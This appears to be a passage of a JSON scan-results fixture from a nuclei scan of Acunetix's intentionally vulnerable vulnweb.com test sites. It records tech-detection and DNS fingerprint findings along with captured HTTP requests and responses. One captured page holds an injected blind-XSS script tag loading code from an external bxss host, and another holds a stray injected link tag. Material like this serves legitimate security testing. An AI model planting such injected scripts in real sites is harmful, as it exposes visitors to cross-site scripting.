href='http://fonts.googleapis.com/css?family=Open+Sans:700' rel='stylesheet' type='text/css'>\n <link href="/static/css/style.css" rel="stylesheet">\n <style type="text/css">\n body {\n padding-top: 60px;\n padding-bottom: 40px;\n }\n .sidebar-nav {\n padding: 9px 0;\n }\n\n @media (max-width: 980px) {\n /* Enable use of floated navbar text */\n .navbar-text.pull-right {\n float: none;\n padding-left: 5px;\n padding-right: 5px;\n }\n }\n </style>\n</head>\n\n<body>\n\n<div class="navbar navbar-fixed-top">\n <div class="navbar-inner">\n <div class="container-fluid">\n <button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse">\n <span class="icon-bar"></span>\n <span class="icon-bar"></span>\n <span class="icon-bar"></span>\n </button>\n <a class="brand" href="https://www.acunetix.com/"><img src="/static/img/logo2.png" alt="Acunetix website security">&nbsp;&nbsp;&nbsp;&nbsp;</a>\n <p class="navbar-text pull-left">\n HTML5 test website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a>.\n </p>\n </div>\n </div>\n</div>\n\n<div class="container-fluid">\n <div class="row-fluid">\n <div class="span2">\n <div class="well sidebar-nav">\n <ul class="nav nav-list">\n <li class="nav-header">Action</li>\n <li class="active"><a href="#/response">Response</a></li>\n\n <li class="nav-header">Acunetix</li>\n <li><a target="_blank" href="http://www.acunetix.com/">Website</a></li>\n\t\t\t\t\t<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/html5-website-security/">HTML5 scanner</a></li>\n\t\t\t\t\t<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/">HTML5 vuln help</a></li>\n <li><a target="_blank" href="http://www.acunetix.com/blog/">Blog</a></li>\n <li><a target="_blank" href="http://www.facebook.com/Acunetix">Facebook</a></li>\n <li><a target="_blank" href="http://www.twitter.com/acunetix/">Twitter</a></li>\n </ul>\n </div><!--/.well -->\n </div><!--/span-->\n <div class="span10">\n <div class="row-fluid">\n \n Your report was submitted, thanks. <!-- invalid -->\n \n </div><!--/row-->\n </div><!--/span-->\n </div><!--/row-->\n\n <hr>\n\t\n\t<div style="background-color:lightgray;width:100%;text-align:center;font-size:14px">\n\t\t<p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.</p>\n\t</div>\n\n <footer>\n <p>&copy; Acunetix Ltd. 2019</p>\n </footer>\n\n</div><!--/.fluid-container-->\n\n<!-- Le javascript\n================================================== -->\n<!-- Placed at the end of the document so the pages load faster -->\n<script src="http://code.jquery.com/jquery-1.9.1.min.js"></script>\n<script src="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js"></script>\n<script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js"></script>\n<script src="/static/app/app.js"></script>\n\n</body>\n</html>", + "is_llm_used": false, + "tags": [ + 5 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 100, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 75, + "endpoint": null, + "target_domain": 1, + "template": "http/technologies/tech-detect.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/tech-detect", + "template_id": "tech-detect", + "matcher_name": "ms-iis", + "name": "Wappalyzer Technology Detection", + "severity": 0, + "description": "", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11.0) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/9.1.2 Safari/602.1.50' 'http://testasp.vulnweb.com'", + "type": "http", + "http_url": "http://testasp.vulnweb.com", + "discovered_date": "2024-11-13T02:34:43.209Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET / HTTP/1.1\r\nHost: testasp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11.0) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/9.1.2 Safari/602.1.50\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 3541\r\nCache-Control: private\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:34:32 GMT\r\nServer: Microsoft-IIS/8.5\r\nSet-Cookie: ASPSESSIONIDSASBSTRC=IAFOKMIBEGJADIFBBNBAOKMB; path=/\r\nX-Powered-By: ASP.NET\r\n\r\n\r\n<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">\r\n<html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" -->\r\n<head>\r\n<!-- InstanceBeginEditable name="doctitle" -->\r\n<title>acuforum forums</title>\r\n<!-- InstanceEndEditable -->\r\n<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">\r\n<!-- InstanceBeginEditable name="head" -->\r\n<!-- InstanceEndEditable -->\r\n<link href="styles.css" rel="stylesheet" type="text/css">\r\n</head>\r\n<body> \r\n<table width="100%" border="0" cellpadding="10" cellspacing="0"> \r\n <tr bgcolor="#008F00"> \r\n <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> \r\n <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> \r\n </tr> \r\n <tr> \r\n <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> \r\n - <a href="./Login.asp?RetURL=%2FDefault%2Easp%3F" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FDefault%2Easp%3F" class="menu">register</a> \r\n\t- <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a>\r\n </div></td> \r\n </tr> \r\n <tr> \r\n <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" -->\r\n\t<table width="100%" border="0" cellspacing="0" cellpadding="5">\r\n <tr>\r\n <td class="tableheader">Forum</td>\r\n <td class="tableheader">Threads</td>\r\n <td class="tableheader">Posts</td>\r\n <td class="tableheader">Last Post</td>\r\n </tr> \r\n\t<tr bgcolor='#FFFFFF'><td><div class='forumtitle'><a href='showforum.asp?id=0'>Acunetix Web Vulnerability Scanner</a></div><div class='forumdescription'>Talk about Acunetix Web Vulnerablity Scanner</div></td><td>82</td><td>82</td><td>11/13/2024 2:31:30 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='forumtitle'><a href='showforum.asp?id=1'>Weather</a></div><div class='forumdescription'>What weather is in your town right now</div></td><td>1</td><td>1</td><td>11/9/2005 12:16:35 PM</td></tr><tr bgcolor='#FFFFFF'><td><div class='forumtitle'><a href='showforum.asp?id=2'>Miscellaneous</a></div><div class='forumdescription'>Anything crossing your mind can be posted here</div></td><td>0</td><td>0</td><td></td></tr>\r\n\t</table><!-- InstanceEndEditable --></td> \r\n </tr> \r\n <tr align="right" bgcolor="#FFFFFF"> \r\n <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> \r\n </tr> \r\n</table> \r\n<div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px">\r\n\t<p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p>\r\n</div>\r\n</body>\r\n<!-- InstanceEnd --></html>\r\n", + "is_llm_used": false, + "tags": [ + 5 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 101, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/technologies/tech-detect.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/tech-detect", + "template_id": "tech-detect", + "matcher_name": "nginx", + "name": "Wappalyzer Technology Detection", + "severity": 0, + "description": "", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:51.0) Gecko/20100101 Firefox/51.0' 'http://testhtml5.vulnweb.com/like'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com/like", + "discovered_date": "2024-11-13T02:34:43.269Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /like HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:51.0) Gecko/20100101 Firefox/51.0\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=utf-8\r\nDate: Wed, 13 Nov 2024 02:34:36 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE html>\n<html lang="en" xmlns="http://www.w3.org/1999/html" data-ng-app="itemsApp">\n<head>\n <meta charset="utf-8">\n <title>SecurityTweets</title>\n <meta name="viewport" content="width=device-width, initial-scale=1.0">\n <meta name="description" content="">\n <meta name="author" content="">\n\n <!-- Le styles -->\n <link href="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css" rel="stylesheet">\n <!--<link href="http://netdna.bootstrapcdn.com/font-awesome/3.0.2/css/font-awesome.css" rel="stylesheet">-->\n <link href='http://fonts.googleapis.com/css?family=Open+Sans:700' rel='stylesheet' type='text/css'>\n <link href="/static/css/style.css" rel="stylesheet">\n <style type="text/css">\n body {\n padding-top: 60px;\n padding-bottom: 40px;\n }\n .sidebar-nav {\n padding: 9px 0;\n }\n\n @media (max-width: 980px) {\n /* Enable use of floated navbar text */\n .navbar-text.pull-right {\n float: none;\n padding-left: 5px;\n padding-right: 5px;\n }\n }\n </style>\n</head>\n\n<body>\n\n<div class="navbar navbar-fixed-top">\n <div class="navbar-inner">\n <div class="container-fluid">\n <button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse">\n <span class="icon-bar"></span>\n <span class="icon-bar"></span>\n <span class="icon-bar"></span>\n </button>\n <a class="brand" href="https://www.acunetix.com/"><img src="/static/img/logo2.png" alt="Acunetix website security">&nbsp;&nbsp;&nbsp;&nbsp;</a>\n <p class="navbar-text pull-left">\n HTML5 test website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a>.\n </p>\n </div>\n </div>\n</div>\n\n<div class="container-fluid">\n <div class="row-fluid">\n <div class="span2">\n <div class="well sidebar-nav">\n <ul class="nav nav-list">\n <li class="nav-header">Action</li>\n <li class="active"><a href="#/response">Response</a></li>\n\n <li class="nav-header">Acunetix</li>\n <li><a target="_blank" href="http://www.acunetix.com/">Website</a></li>\n\t\t\t\t\t<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/html5-website-security/">HTML5 scanner</a></li>\n\t\t\t\t\t<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/">HTML5 vuln help</a></li>\n <li><a target="_blank" href="http://www.acunetix.com/blog/">Blog</a></li>\n <li><a target="_blank" href="http://www.facebook.com/Acunetix">Facebook</a></li>\n <li><a target="_blank" href="http://www.twitter.com/acunetix/">Twitter</a></li>\n </ul>\n </div><!--/.well -->\n </div><!--/span-->\n <div class="span10">\n <div class="row-fluid">\n \n Thank you very much for your feedback! <!-- invalid -->\n<link src='http://localhost/link'>\n \n </div><!--/row-->\n </div><!--/span-->\n </div><!--/row-->\n\n <hr>\n\t\n\t<div style="background-color:lightgray;width:100%;text-align:center;font-size:14px">\n\t\t<p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.</p>\n\t</div>\n\n <footer>\n <p>&copy; Acunetix Ltd. 2019</p>\n </footer>\n\n</div><!--/.fluid-container-->\n\n<!-- Le javascript\n================================================== -->\n<!-- Placed at the end of the document so the pages load faster -->\n<script src="http://code.jquery.com/jquery-1.9.1.min.js"></script>\n<script src="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js"></script>\n<script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js"></script>\n<script src="/static/app/app.js"></script>\n\n</body>\n</html>", + "is_llm_used": false, + "tags": [ + 5 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 102, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/technologies/tech-detect.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/tech-detect", + "template_id": "tech-detect", + "matcher_name": "google-font-api", + "name": "Wappalyzer Technology Detection", + "severity": 0, + "description": "", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36' 'http://testhtml5.vulnweb.com/logout'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com", + "discovered_date": "2024-11-13T02:34:43.334Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /logout HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nAccess-Control-Allow-Origin: *\r\nContent-Type: text/html; charset=utf-8\r\nDate: Wed, 13 Nov 2024 02:34:37 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE html>\n<html lang="en" xmlns="http://www.w3.org/1999/html" data-ng-app="itemsApp">\n<head>\n <meta charset="utf-8">\n <title>SecurityTweets - HTML5 test website for Acunetix Web Vulnerability Scanner</title>\n <meta name="viewport" content="width=device-width, initial-scale=1.0">\n <meta name="description" content="">\n <meta name="author" content="">\n\n <!-- Le styles -->\n <link href="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css" rel="stylesheet">\n <link href='http://fonts.googleapis.com/css?family=Lora:400,700,400italic,700italic' rel='stylesheet' type='text/css'>\n <link href="/static/css/style.css" rel="stylesheet">\n\n <link rel="icon" type="image/png" href="http://www.acunetix.com/favicon.ico">\n\n <style type="text/css">\n body {\n padding-top: 60px;\n padding-bottom: 40px;\n }\n .sidebar-nav {\n padding: 9px 0;\n }\n\n @media (max-width: 980px) {\n /* Enable use of floated navbar text */\n .navbar-text.pull-right {\n float: none;\n padding-left: 5px;\n padding-right: 5px;\n }\n }\n </style>\n</head>\n\n<body>\n\n<div class="navbar navbar-fixed-top">\n <div class="navbar-inner">\n <div class="container-fluid">\n <button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse">\n <span class="icon-bar"></span>\n <span class="icon-bar"></span>\n <span class="icon-bar"></span>\n </button>\n <a class="brand" href="https://www.acunetix.com/"><img src="/static/img/logo2.png" alt="Acunetix website security">&nbsp;&nbsp;&nbsp;&nbsp;</a>\n <p class="navbar-text pull-left">\n Vulnerable HTML5 test website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a>.\n </p>\n\n <p class="navbar-text pull-right">\n \n <a href="#myModal" role="button" class="btn" data-toggle="modal">Login</a>\n \n </p>\n </div>\n </div>\n</div>\n\n<div class="container-fluid">\n <div class="row-fluid">\n <div class="span2">\n <div class="well sidebar-nav">\n <ul class="nav nav-list">\n <li class="nav-header">Views</li>\n <li id="popularLi" class="active"><a href="#/popular">Popular</a></li>\n <li><a href="#/latest">Latest</a></li>\n <li><a href="#/carousel">Carousel</a></li>\n <li><a href="#/archive">Archive</a></li>\n\n <li class="nav-header">Website</li>\n <li><a href="#/about">About</a></li>\n <li><a href="#/contact">Contact</a></li>\n\n <li class="nav-header">Acunetix</li>\n <li><a target="_blank" href="http://www.acunetix.com/">Website</a></li>\n\t\t\t\t\t<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/html5-website-security/">HTML5 scanner</a></li>\n\t\t\t\t\t<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/">HTML5 vuln help</a></li>\n <li><a target="_blank" href="http://www.acunetix.com/blog/">Blog</a></li>\n <li><a target="_blank" href="http://www.facebook.com/Acunetix">Facebook</a></li>\n <li><a target="_blank" href="http://www.twitter.com/acunetix/">Twitter</a></li>\n </ul>\n </div><!--/.well -->\n </div><!--/span-->\n <div class="span10">\n <div class="row-fluid">\n <div ng-view></div>\n </div><!--/row-->\n </div><!--/span-->\n </div><!--/row-->\n\n <hr>\n\n <div class="row-fluid">\n <div class="pull-left" style="font-size: xx-small;" id="refId"></div>\n </div>\n\t\n\t<div style="background-color:lightgray;width:100%;text-align:center;font-size:14px">\n\t\t<p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.</p>\n\t</div>\n\n <footer>\n <p class="pull-left">&copy; Acunetix Ltd. 2019</p>\n </footer>\n\n</div><!--/.fluid-container-->\n\n\n<!-- Modal -->\n<div id="myModal" class="modal hide fade" tabindex="-1" role="dialog" aria-labelledby="myModalLabel" aria-hidden="true">\n <form class="modal-body" action="/login" method="POST" id="loginForm">\n <div class="modal-header">\n <button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button>\n <h3 id="myModalLabel">Login</h3>\n </div>\n <div class="modal-body">\n <div class="control-group">\n <!-- Username -->\n <label class="control-label" for="username">Username</label>\n <div class="controls">\n <input type="text" id="username" name="username" placeholder="" class="input-xlarge" value="admin">\n </div>\n </div>\n\n <div class="control-group">\n <!-- Password-->\n <label class="control-label" for="password">Password</label>\n <div class="controls">\n <input type="password" id="password" name="password" placeholder="" class="input-xlarge">\n </div>\n </div>\n\n <div class="control-group">\n <a href="#" class="btn" id="loginFormForgot">Forgot Pwd?</a>\n </div>\n\n </div>\n <div class="modal-footer">\n <button class="btn btn-primary" id="loginFormSubmit">Login</button>\n <button class="btn" data-dismiss="modal" aria-hidden="true">Close</button>\n </div>\n </form>\n</div>\n\n<!-- Le javascript\n================================================== -->\n<!-- Placed at the end of the document so the pages load faster -->\n<script src="http://code.jquery.com/jquery-1.9.1.min.js"></script>\n<script src="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js"></script>\n<script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js"></script>\n\n<!-- App libs -->\n\n<script src="/static/app/app.js"></script>\n<script src="/static/app/libs/sessvars.js"></script>\n<script src="/static/app/post.js"></script>\n<script src="/static/app/controllers/controllers.js"></script>\n<script src="/static/app/services/itemsService.js"></script>\n<script src="http://bxss.s3.amazonaws.com/ad.js"></script>\n\n\n</body>\n</html>", + "is_llm_used": false, + "tags": [ + 5 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 103, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "dns/txt-fingerprint.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/txt-fingerprint", + "template_id": "txt-fingerprint", + "matcher_name": "", + "name": "DNS TXT Record Detected", + "severity": 0, + "description": "A DNS TXT record was detected. The TXT record lets a domain admin leave notes on a DNS server.", + "impact": null, + "remediation": null, + "extracted_results": "[\"\\\"google-site-verification:toEctYsulNIxgraKk7H3z58PCyz2IOCc36pIupEPmYQ\\\"\"]", + "references": "['https://www.netspi.com/blog/technical/network-penetration-testing/analyzing-dns-txt-records-to-fingerprint-service-providers/']", + "cvss_metrics": "", + "cvss_score": null, + "curl_command": null, + "type": "dns", + "http_url": "http://testphp.vulnweb.com", + "discovered_date": "2024-11-13T02:34:43.416Z", + "open_status": true, + "hackerone_report_id": null, + "request": ";; opcode: QUERY, status: NOERROR, id: 41761\n;; flags: rd ad; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 4096\n\n;; QUESTION SECTION:\n;testphp.vulnweb.com.\tIN\t TXT\n", + "response": ";; opcode: QUERY, status: NOERROR, id: 41761\n;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 1232\n\n;; QUESTION SECTION:\n;testphp.vulnweb.com.\tIN\t TXT\n\n;; ANSWER SECTION:\ntestphp.vulnweb.com.\t3600\tIN\tTXT\t"google-site-verification:toEctYsulNIxgraKk7H3z58PCyz2IOCc36pIupEPmYQ"\n", + "is_llm_used": false, + "tags": [ + 1, + 4 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 104, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "dns/txt-fingerprint.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/txt-fingerprint", + "template_id": "txt-fingerprint", + "matcher_name": "", + "name": "DNS TXT Record Detected", + "severity": 0, + "description": "A DNS TXT record was detected. The TXT record lets a domain admin leave notes on a DNS server.", + "impact": null, + "remediation": null, + "extracted_results": "[\"\\\"google-site-verification:toEctYsulNIxgraKk7H3z58PCyz2IOCc36pIupEPmYQ\\\"\"]", + "references": "['https://www.netspi.com/blog/technical/network-penetration-testing/analyzing-dns-txt-records-to-fingerprint-service-providers/']", + "cvss_metrics": "", + "cvss_score": null, + "curl_command": null, + "type": "dns", + "http_url": "http://testphp.vulnweb.com", + "discovered_date": "2024-11-13T02:34:43.508Z", + "open_status": true, + "hackerone_report_id": null, + "request": ";; opcode: QUERY, status: NOERROR, id: 44265\n;; flags: rd ad; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 4096\n\n;; QUESTION SECTION:\n;testphp.vulnweb.com.\tIN\t TXT\n", + "response": ";; opcode: QUERY, status: NOERROR, id: 44265\n;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 512\n\n;; QUESTION SECTION:\n;testphp.vulnweb.com.\tIN\t TXT\n\n;; ANSWER SECTION:\ntestphp.vulnweb.com.\t3599\tIN\tTXT\t"google-site-verification:toEctYsulNIxgraKk7H3z58PCyz2IOCc36pIupEPmYQ"\n", + "is_llm_used": false, + "tags": [ + 1, + 4 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 105, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "dns/caa-fingerprint.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/caa-fingerprint", + "template_id": "caa-fingerprint", + "matcher_name": "", + "name": "CAA Record", + "severity": 0, + "description": "A CAA record was discovered. A CAA record is used to specify which certificate authorities (CAs) are allowed to issue certificates for a domain.", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": "['https://support.dnsimple.com/articles/caa-record/#whats-a-caa-record']", + "cvss_metrics": "", + "cvss_score": null, + "curl_command": null, + "type": "dns", + "http_url": "http://testhtml5.vulnweb.com", + "discovered_date": "2024-11-13T02:34:43.590Z", + "open_status": true, + "hackerone_report_id": null, + "request": ";; opcode: QUERY, status: NOERROR, id: 26998\n;; flags: rd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 4096\n\n;; QUESTION SECTION:\n;testhtml5.vulnweb.com.\tIN\t CAA\n", + "response": ";; opcode: QUERY, status: NOERROR, id: 26998\n;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 1232\n\n;; QUESTION SECTION:\n;testhtml5.vulnweb.com.\tIN\t CAA\n\n;; AUTHORITY SECTION:\nvulnweb.com.\t86394\tIN\tSOA\tns1.eurodns.com. hostmaster.eurodns.com. 2024111200 86400 7200 604800 86400\n", + "is_llm_used": false, + "tags": [ + 1, + 2 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 106, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "dns/txt-fingerprint.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/txt-fingerprint", + "template_id": "txt-fingerprint", + "matcher_name": "", + "name": "DNS TXT Record Detected", + "severity": 0, + "description": "A DNS TXT record was detected. The TXT record lets a domain admin leave notes on a DNS server.", + "impact": null, + "remediation": null, + "extracted_results": "[\"\\\"google-site-verification:toEctYsulNIxgraKk7H3z58PCyz2IOCc36pIupEPmYQ\\\"\"]", + "references": "['https://www.netspi.com/blog/technical/network-penetration-testing/analyzing-dns-txt-records-to-fingerprint-service-providers/']", + "cvss_metrics": "", + "cvss_score": null, + "curl_command": null, + "type": "dns", + "http_url": "http://testphp.vulnweb.com", + "discovered_date": "2024-11-13T02:34:43.675Z", + "open_status": true, + "hackerone_report_id": null, + "request": ";; opcode: QUERY, status: NOERROR, id: 29545\n;; flags: rd ad; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 4096\n\n;; QUESTION SECTION:\n;testphp.vulnweb.com.\tIN\t TXT\n", + "response": ";; opcode: QUERY, status: NOERROR, id: 29545\n;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 512\n\n;; QUESTION SECTION:\n;testphp.vulnweb.com.\tIN\t TXT\n\n;; ANSWER SECTION:\ntestphp.vulnweb.com.\t3599\tIN\tTXT\t"google-site-verification:toEctYsulNIxgraKk7H3z58PCyz2IOCc36pIupEPmYQ"\n", + "is_llm_used": false, + "tags": [ + 1, + 4 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 107, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "dns/txt-fingerprint.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/txt-fingerprint", + "template_id": "txt-fingerprint", + "matcher_name": "", + "name": "DNS TXT Record Detected", + "severity": 0, + "description": "A DNS TXT record was detected. The TXT record lets a domain admin leave notes on a DNS server.", + "impact": null, + "remediation": null, + "extracted_results": "[\"\\\"google-site-verification:toEctYsulNIxgraKk7H3z58PCyz2IOCc36pIupEPmYQ\\\"\"]", + "references": "['https://www.netspi.com/blog/technical/network-penetration-testing/analyzing-dns-txt-records-to-fingerprint-service-providers/']", + "cvss_metrics": "", + "cvss_score": null, + "curl_command": null, + "type": "dns", + "http_url": "http://testphp.vulnweb.com", + "discovered_date": "2024-11-13T02:34:43.760Z", + "open_status": true, + "hackerone_report_id": null, + "request": ";; opcode: QUERY, status: NOERROR, id: 38964\n;; flags: rd ad; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 4096\n\n;; QUESTION SECTION:\n;testphp.vulnweb.com.\tIN\t TXT\n", + "response": ";; opcode: QUERY, status: NOERROR, id: 38964\n;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; 